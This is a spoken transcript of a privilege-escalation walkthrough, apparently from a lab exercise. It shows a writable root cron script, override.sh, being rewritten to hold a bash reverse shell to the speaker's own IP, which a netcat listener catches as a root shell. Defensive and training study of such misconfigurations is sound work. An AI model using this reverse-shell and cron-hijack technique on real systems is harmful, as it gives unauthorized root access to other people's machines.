So in cron job file permissions, we can see in that theoretical part that we can see that cron tabs. So first of all, let me print out that cat and then etc cron tab. So in cron tab, we can see there are some that commented lines and then shell bin passage and then some path and then some number. So in number we can see that 17, that means that for month, for minute, hours, day of month, so and so on. So you can see we can run that cron dot hourly, cron dot daily, weekly, monthly, and we have some that file which is override dot sh and compress dot sh. These having that only asterisk. That's mean it running that continuously, but we can assume like it run that in within a 1 minute. So we can like whenever you found any that suspicious file which have that in cron tabs having that multiple asterisk. So first of all let me that search like where is that override dot sh. So first of all locate override dot sh, and there were cache locate db is more than 8 days old, user local bin override dot sh. So we can see that in user local bin there is a file which is override dot sh. So let me check that permission. So ls hyphen l and then user local bin override dot sh. So we have permission to read and write for that normal user. That's mean this is the normal user and we can edit this file directly because it's like already that misconfigured. So let me see what is in this file. So get user local bin and then override.sh. So here is some echo date and some tmp and then useless. So we have to change for getting that reverse connection. So at my computer system I'm using that netcat, which is like that swiss army knife where we can like get that access directly. So nc and then hyphen l for listen, V for verbose, and P for port number. Or we can use that this like also, or you can use that hyphen LVP that listen, verbose, and port number, anything port number. So let's say 4444. So I'm just entering this. So listening on that any 444, and you can see this is my that IP. That's mean we have to that connect with our reverse IP connection. So we have to edit this file. So let me this one. So instead of Kate, I just put nano. Now we can edit this file. So for edit or that create this reverse shell, there's an online website which is revshells.com where we can generate that reverse shell. So there's an IP and the port number. So our IP is 10.17.4.36. So let me add in this IP section, and the port number we have already given that 444. So you can see that for listener we have to add that nc hyphen lvnp, which is that 444, and for the ip we have already given that for that reverse. And I search here for that bash. Now why I search for bash, because when I go to that bash hyphen I or bash 196, so I can see only that sh. So we have to verify that in our machine with the help of let me that close this. So we can add that ps hyphen p and then dollar dollar. So we can see that cmd is the bash. So sometimes you will get that only that sh, or sometimes you will get that bash. So that's why I'm using for that bash command. So let me that edit again that override.sh file. So now we have an idea that what we have to like write down. So this is the command. So we'll use that bash instead of sh, then hyphen I then let's sign and dev TCP IP 4444, that's port number, and 0 and that and 1. That's mean we just whenever we like create that reverse shell na, and so it will generate some error or some uh, like any log, so like null values and all, so we'll directly move into that are null folder. So that's why we are using that last ones at 0 and 1. So let me copy this one, so we can get, let me type that bash hyphen I and then and sign and dv tcp, and our IP is 10.17.4.36, and the port number we have already given, which is 4444, and then error should be redirected to that folder, so we can get only directly that reverse connection. So let me save, control X, and now it's automatically run in a minute, so we have to wait sometimes. So and sometimes we will get that reverse connection here, and yes, and we got the reverse connection. So we can see we have that root permission. So this is that easiest way in to analysis that content, and it's like misconfigure that file permission, so you'll get that reverse shell as in that root permissions directly.